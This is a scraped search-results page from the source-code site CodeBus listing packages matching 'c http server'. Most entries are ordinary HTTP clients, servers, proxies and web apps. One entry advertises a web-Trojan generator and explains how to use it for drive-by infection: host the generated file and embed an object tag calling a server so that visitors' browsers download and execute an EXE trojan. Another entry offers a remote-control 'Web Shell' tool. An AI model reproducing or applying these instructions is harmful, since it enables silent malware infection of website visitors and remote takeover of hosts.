Welcome![Sign In][Sign Up]
Location:
Search - c http server

Search list

[Internet-Networkhttp_client_2.0

Description: 一个简单的http下载程序,用C++在linux下写了一个简单的http下载程序,程序的功能很简单,在终端输入文件所在网址,程序会单线程从服务器上下载该文件到本地。程序里面涉及了socket编程、http协议、二进制文件的写入。-a simple http download and use under linux C wrote in a simple http download procedure is very simple function of the input terminal is located site will be single-threaded process from the server to download the file to the local. Inside the socket programming involved, http agreement, write a binary file.
Platform: | Size: 5253 | Author: 丁丁 | Hits:

[WEB Codegkbm

Description: 《江苏省高考网上报名系统》——中学2005版 本软件版权归江苏无锡孙双忠所有,为造福广大中学教务人员,你可以任意复制、传播! 使用方法: 将gkbm文件夹只接上传服务器即可! 本机调试只需将gkbm文件夹放在C:\\inetpub\\wwwroot\\文件夹下。 然后在IE中输入:http:\\\\localhost\\gkbm\\index.asp即可运行, 管理入口:http:\\\\localhost\\gkbm\\admin.asp 用户名和口令:admin 如要显示学生照片,请将已经剪切好的照片存放于photo文件夹中! 如你在使用过程中有任何问题,请QQ(106053410)联系或在我的网站留言, 我的网址:http://wxsz.wxjy.com.cn/gkbm/index.asp -"Jiangsu Province entrance examination system for the Internet" -- secondary 2005 version Banquangui Jiangsu Wuxi Sun Shuang-all for the benefit of the general secondary teaching staff, you can copy arbitrary, dissemination! Use : gkbm folder will only then can upload server! The machine will only gkbm debug folder on the C : \\ inetpub \\ wwwroot \\ folder. Then in IE input : http : \\ \\ localhost \\ gkbm \\ index.asp can run, the management portal : http : \\ \\ localhost \\ gkbm \\ admin.asp Username and Password : admin students to show pictures, please have a good shearing photographs stored in photo folder! if you are using the process have any questions, please QQ (106053410) or contact me at the website message, I Address : http://wxsz.wxjy.com.cn/gkbm/index.asp
Platform: | Size: 1131671 | Author: 李高 | Hits:

[Web Serverbnbt_daibei_src

Description: 岱北聆泉站的BT发布服务器程序 http://bt.daibei.net linux下C++开发的,效率很高 -Dai North Station Master Luk BT released server http : / / C bt.daibei.net linux development, high efficiency
Platform: | Size: 617851 | Author: 韩林 | Hits:

[Internet-NetworkHTTP_server_vc6

Description: 一个HTTP代理服务器的实现代码,采用visual c++ 6.0开发工具,有兴趣的可以看一下。-an HTTP proxy server codes, using visual c 6.0 development tool interested can look at.
Platform: | Size: 223518 | Author: 刘流 | Hits:

[Editornotbook

Description: 1.服务器装有jdk和resin服务器等 2.安装完JSDK后,配置下面的内容: 在系统变量中找到ClassPath并加入下面内容(如果你找不到ClassPath,则新建它): c:\\jsdk\\LIB\\dt.JAR c:\\jsdk\\LIB\\TOOLS.JAR c:\\jsdk\\BIN . 再在系统变量中找到Path并加入下面内容: c:\\jsdk\\ c:\\jsdk\\bin 3.直接解压resin就可以运行把程序放在doc目录下面把classes目录的文件放在 WEB-INF目录下 4.在odbc放里加入数据库路径为guestbook也可改为别的要修改classes\\myjsp\\dbconn.java文件 5.上面成功后就可以http://localhost:8080/目录名/可以访问了-1. Jdk installed servers and server 2 resin. After installing JSDK, It will contain the following : the system variables found ClassPath and add the following (if you can not find ClassPath , it was new) : c : \\ jsdk \\ LIB \\ dt.JAR c : \\ jsdk \\ LIB \\ TOOLS.JAR c : \\ jsdk \\ BIN. then the system variables found Path and add the following : c : \\ jsdk \\ c : \\ jsdk \\ bin 3. directly extract resin can run the procedure on the doc directory put cl Contents of the document asses on the WEB-INF directory 4. odbc up in the database have added the path to g uestbook also can be changed to other classes to amend \\ myjsp \\ dbconn.ja va 5. above can be successful after http://localhost : 8,080 / directory name / can be visited. .
Platform: | Size: 694769 | Author: 彭静 | Hits:

[Crack Hackv5395_iword

Description: Iword2004 文档控件源码 1,控件支持全部Office菜单,支持Office的打印预览,控件强大的B/S通讯技术。 2,能够将服务器数据库中的数据或者用户自定义的数据插入当前文档的指定位置。 3,可以将文档中的指定数据随时保存到服务器数据库或者指定的目录中。 4,控件能够在浏览器窗口中直接编辑Word文档并保存到Web服务器上,实现文档和数据库的统一管理。 5,控件同时支持痕迹保留,手写签名,电子印章等办公自动化系统必备的功能。 6,控件采用标准HTTP协议,支持任意后台Web服务器。 7,任意后台编程语言(Asp,c,c++, Jsp,vb, Php,VB.NET,C#.NET等) 8,大量的接口函数,全面支持二次开发 -Iword2004 a source document control, the control supports all the Office menu, Office support the Print Preview Control powerful B / S communications technology. 2, the database server to the data or user-defined data into the current document, the designated location. 3, the document can be specified at any time to preserve data to the database server or the designated directory. 4, the controls in the browser window directly edit and save Word documents to the Web server, Documents and databases to achieve the unified management. 5, traces control while supporting reservations, handwritten signatures, electronic seals of office automation system and other necessary functions. 6, controls the use of standard HTTP protocol support arbitrary background of a Web server. 7, arbitrary backgrou
Platform: | Size: 257114 | Author: 宋雅彧 | Hits:

[Proxy ServerHTTP_ProxyServer_VC

Description: C++语言写的一个HTTP代理服务器实例,用户可以通过它实现一级或二级代理,同时该代理服务器还内嵌有WEB服务器,用户可以通过其虚拟域名对其主页进行访问.请在VC++6.0及以上环境下编译-the C language to write an HTTP proxy server example, users can achieve it one or two agents, Comparisons of the proxy server is also equipped with a Web server, Users can, through its virtual domain name of their home for a visit. Please VC 6.0 and above environment compiler
Platform: | Size: 157509 | Author: 如歌 | Hits:

[Otherwenmingphp5mysql5

Description: php开发的行业搜索系统!!! 2. 安装 ------------ a. 解压程序rar文件,用二进制方式上传到你的网站的根目录或某一目录下 注意:一定要将ftp上传工具设置为二进制方式,再上传程序文件 b. unix或linux服务器下, 将以下文件属性改为:666 (或777) - function/base_info.php - function/emphasis_info.php - function/admin_pass_info.php - function/search_info.php - function/userfield_info.php - template/default/目录下的所有html文件 c. unix或linux服务器下, 将upfile/目录属性改为:777 d. 建立一个mysql数据库,并记下用户名和密码,以便安装时使用 e. 进入安装目录http://www.your_website.com/install/, 自动运行安装程序 f. 安装完成后,要求删除安装目录install/及其下文件 g. 后台管理目录http://www.your_website.com/adiministrator/ h. 可修改adiministrator/目录为你希望的独特的名字-php development of the industry Search System! ! ! 2. Installation --- --- a. decompression procedures rar documents, using binary mode to upload your site to the root directory or a directory attention : it must ftp upload tools set to binary mode, then upload files b. unix or linux server will attribute to the following documents : 666 (or 777) - function / base_info.php - functio n / emphasis_info.php-function / admin_pass_ info.php-function / search_info.php - functi on / userfield_info.php - template / default / Head recorded all the html document c. unix or linux server. will upfile / directory attribute the following : the establishment of a 777 d. mysql database, charged under the user name and password to use e. installation to installation directory http : / / www.your_websi
Platform: | Size: 190849 | Author: xiaolei | Hits:

[Windows Developie66_00272

Description: 本网页木马生成器生成的为最新版本的网页木马,对90%以上的浏览器都有作用,但是唯一的遗憾就是你必须拥有自己的服务器,当然你也可以用你的肉鸡去做,具体使用方法是这样的,按说明填写程序的内容,如果按默认内容填写将在C盘下生成一个Frank.Tk的网页木马文件,然后你把他传到你的服务器上,但是注意,你必须在你的WEB服务器的MIME选项中添加.Tk这个文件类型,否则不能成功,然后把你的EXE木马文件传到FTP服务器中,这样都做好了之后,在你的主页中加这样一句代码:<object data=http://192.168.0.1/Frank.tk></object>,一切做好了之后打开你的主页,你的FTP服务器里的木马文件就自动下载到你的硬盘并自动执行,只要你的服务器速度快且正常,那么成功率几乎100%,由于本程序写得有点仓促,有什么不足请指正,若还有问题请访问本站论坛Http://BBS.QQ600.COM-this website Trojan generator for the production of the latest version of the Trojan website, more than 90% of browsers have, but the only regret is that you have to have their own server, of course, you can also use your broiler do, the specific use of this method, follow the instructions to fill in the details of the procedure if by default to fill in the contents of the next generation C-1 Trojan Frank.Tk's website, and then you put him spread your server, but note that you need in your Web server MIME option added. Tk this document type, or not successful, then Trojan your EXE file reached FTP server, so well after all, in your Home adding such a code : lt; object data = http://192.168.0.1/Frank.tkgt; lt; / objectgt; all done after a good open your home, your FTP server's Troja
Platform: | Size: 2181440 | Author: 可靠 | Hits:

[Other resourceCHAP05

Description: 本压缩文件为东方天华主编的Visual C++.Net范例入门与提高中第5章光盘代码。光盘中包含如下的程序的代码。 5.1 创建商店订货信息管理数据库 5.2 创建商店订货信息管理系统 5.3 多视图技术的实现 5.4 多表操作的实现 5.5 用ADO访问数据库 5.6 一个简单的客户/服务器程序 5.7 HTTP应用程序 5.8 FTP浏览器 5.9 Ping程序的实现 5.10 ATL Server编程实例 5.11 Web Service服务器端程序 5.12 Web Service客户端程序
Platform: | Size: 629360 | Author: 陈小冬 | Hits:

[WEB Codetianfengwenzhangxitong

Description: 天风文章系统 v1.1.0(源码) --- --- --- --- 天风文章 V1.1.0 演示: http://ifree.somee.com (顶部Google广告为免费空间加载的,非本系统内容) 个人主页: 提供设计文档、代码下载等内容 http://skywind.cnblogs.com http://skywind.phpnet.us http://skywind81.icpcn.com 天风文章V1.1.0 功能简介: 1) 开源!同时提供设计文档! 2) asp.net2.0(C#)的新闻/文章类系统,同时支持Access和SQL Server数据库 3) 栏目、设置等内容后台维护,前台自动生成显示内容 4) 前台采用样式(Theme)设计,优化显示,同时可以方便更改系统样式 5) 文章目录:文章栏目二级分类,随意修改 6) 文章编辑:后台编辑文章,采用htm格式编辑录入文章,使文章更美观 7) 图片新闻:支持图片文章,在主页显示最新的图片新闻(文章) 8) 登陆验证:登陆采用图片验证,密码采用MD5方式加密(默认用户名\\密码均为admin) 9) 搜索功能:对站内文章的按照文章标题(内容)进行搜索。 10) 公告管理:后台可以维护Htm格式发布的公告 11) 留言本:访客留言后,审核后才能显示
Platform: | Size: 941887 | Author: 诸葛三皮 | Hits:

[JSP/Javapisces_1.3_src

Description: A distributed, peer-to-peer, server-less communication & messaging solution for JAVA (JMS), C++ and .NET applications, integrates with JBoss, WebLogic & WebSphere. Offers guaranteed delivery, security and transactions. Supports TCP, SSL & HTTP protocols
Platform: | Size: 89416 | Author: ehunter | Hits:

[WEB Codepingliuping_xuyuan

Description: 自己做的用c#语言开发的web程序,数据库是sql server。仿http://www.clxk.net/xy3/
Platform: | Size: 95107 | Author: 魏庆辉 | Hits:

[Linux-Unixspserver-0[1].8.5.src.tar

Description: spserver 是一个实现了半同步/半异步(Half-Sync/Half-Async)和领导者/追随者(Leader/Follower) 模式的服务器框架,能够简化 TCP server 的开发工作。 spserver 使用 c++ 实现,目前实现了以下功能: 1.封装了 TCP server 中接受连接的功能; 2.使用非阻塞型I/O和事件驱动模型,由主线程负责处理所有 TCP 连接上的数据读取和发送,因此连接数不受线程数的限制; 3.主线程读取到的数据放入队列,由一个线程池处理实际的业务。 4.一个 http 服务器框架,即嵌入式 web 服务器(请参考: SPWebServer:一个基于 SPServer 的 web 服务器框架)
Platform: | Size: 71545 | Author: Eagle518 | Hits:

[Internet-Networkwsh-2.2.1.tar

Description: Wsh, \"Web Shell\" - 远程控制UNIX/WIN SHELL,它基于HTTP/HTTPS协议,此软件包含两个分别对应其客户端/服务器端的PERL脚本和一个服务端C语言程序。客户端脚本与控制台终端用法相似。服务器端仅以一个CGI脚本的形式出现在目标(受控)主机上。-Wsh, "Web Shell" - remote control UNIX / WIN SHELL, which is based on HTTP / HTTPS protocol, the software includes two corresponding its client / server-PERL script and a service-C Programming Language. Client script and usage similar to a console terminal. Only one server CGI script in the form of goals (controlled) on the mainframe.
Platform: | Size: 25022 | Author: 欧锋 | Hits:

[Internet-Networkwsh-2.2.1.tar

Description: Wsh, "Web Shell" - 远程控制UNIX/WIN SHELL,它基于HTTP/HTTPS协议,此软件包含两个分别对应其客户端/服务器端的PERL脚本和一个服务端C语言程序。客户端脚本与控制台终端用法相似。服务器端仅以一个CGI脚本的形式出现在目标(受控)主机上。-Wsh, "Web Shell"- remote control UNIX/WIN SHELL, which is based on HTTP/HTTPS protocol, the software includes two corresponding its client/server-PERL script and a service-C Programming Language. Client script and usage similar to a console terminal. Only one server CGI script in the form of goals (controlled) on the mainframe.
Platform: | Size: 24576 | Author: 欧锋 | Hits:

[WEB Codegkbm

Description: 《江苏省高考网上报名系统》——中学2005版 本软件版权归江苏无锡孙双忠所有,为造福广大中学教务人员,你可以任意复制、传播! 使用方法: 将gkbm文件夹只接上传服务器即可! 本机调试只需将gkbm文件夹放在C:\inetpub\wwwroot\文件夹下。 然后在IE中输入:http:\\localhost\gkbm\index.asp即可运行, 管理入口:http:\\localhost\gkbm\admin.asp 用户名和口令:admin 如要显示学生照片,请将已经剪切好的照片存放于photo文件夹中! 如你在使用过程中有任何问题,请QQ(106053410)联系或在我的网站留言, 我的网址:http://wxsz.wxjy.com.cn/gkbm/index.asp -"Jiangsu Province entrance examination system for the Internet"-- secondary 2005 version Banquangui Jiangsu Wuxi Sun Shuang-all for the benefit of the general secondary teaching staff, you can copy arbitrary, dissemination! Use : gkbm folder will only then can upload server! The machine will only gkbm debug folder on the C : \ inetpub \ wwwroot \ folder. Then in IE input : http : \ \ localhost \ gkbm \ index.asp can run, the management portal : http : \ \ localhost \ gkbm \ admin.asp Username and Password : admin students to show pictures, please have a good shearing photographs stored in photo folder! if you are using the process have any questions, please QQ (106053410) or contact me at the website message, I Address : http://wxsz.wxjy.com.cn/gkbm/index.asp
Platform: | Size: 1131520 | Author: 李高 | Hits:

[.netPluginMJPEGVideoStreamer

Description: Program that takes some pictures and put it to your own server. Connecting to server via HTTP.
Platform: | Size: 90781696 | Author: Wonderfield | Hits:

[Otherwebsocket.tar

Description: 大神写的websocket服务器,但有内存报错,也没管内存释放,还有一些不完善的地方,我给弄好了 把ws.html放到你的网站。修改里面的ip。 编译和运行服务器端(我是centos下) gcc -g -o websocket websocket.c valgrind --show-reachable=yes --leak-check=full ./websocket 访问http://你的网站/ws.html看效果。(The websocket server written by big God has memory errors and no memory release. There are still some imperfections. Put ws.html on your website. Modify the IP inside. Compile and run the server side (I am under CentOS) GCC -g -o websocket websocket.c Valgrind --show-reachable=yes --leak-check=full./websocket Visit http:// your website /ws.html to see the effect.)
Platform: | Size: 86016 | Author: 雷先生123 | Hits:

[Internet-NetworkMONG

Description: mongoose v6.15,多线程http——server,线程数可设。从GitHub下载C语言原代码,在vc6里面编译成c++工程(multi-threads http_server, based on source code from Github. The project is conducted in VC6, converted from c language. The threads num can be edited in code.)
Platform: | Size: 3022848 | Author: kyoosan | Hits:
« 1 2 ... 5 6 7 8 9 1011 12 13 14 15 »

CodeBus www.codebus.net